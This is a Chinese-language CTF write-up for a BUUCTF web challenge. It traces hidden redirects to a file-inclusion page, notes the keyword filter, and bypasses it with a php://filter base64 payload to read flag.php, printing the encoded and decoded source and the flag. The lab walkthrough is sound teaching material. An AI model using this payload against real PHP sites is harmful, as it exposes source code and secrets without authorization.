- 打开靶机后,可以看到这样一个网页
2.页面上看没有可以输入的地方,于是尝试看一下网页源代码,发现有一个可跳转的网址:Archive_room.php
3.跳转后出现如下页面,有一个secret选项,点击一下发现没有任何可用信息,查看源代码也没有发现。
4.返回上一个页面看一下源代码,发现还有一个可跳转网址
5.可以看到跳转的网页应该是action.php,但是点开后发现访问的是end.php。
6.抓包查看一下跳转过程
7.发现由action.php到end.php中间还有一个过程,点开看一下发现还有隐藏跳转
8.进入这个网页发现是一串代码
可以看到只要输入”../”、”tp”、”input”、”data”都会返回Oh no!,所以这些关键字被过滤掉了。
比如下面这种输入会显示Oh no!
http://355ecb6c-7fc7-4324-a22b-f8dde1fb5b75.node4.buuoj.cn:81/secr3t.php?file=php://input
直接进入看不到什么
9.所以如果想要看到这个文件中的内容,需要通过伪协议进行绕过
令参数为:
php://filter/convert.base64-encode/resource=flag.php
这样就可以得到flag.php文件源码base64编码后的字符串了。
得到如下base64位编码:
PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7NGE4YmUyZTYtNzkyNy00YmYwLTg1YTktM2I5MDIzMDEwY2VifSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=
10.解码后得到一串代码
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "我就在这里";
$flag = 'flag{4a8be2e6-7927-4bf0-85a9-3b9023010ceb}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>
</html>
11、得到flag
flag{4a8be2e6-7927-4bf0-85a9-3b9023010ceb}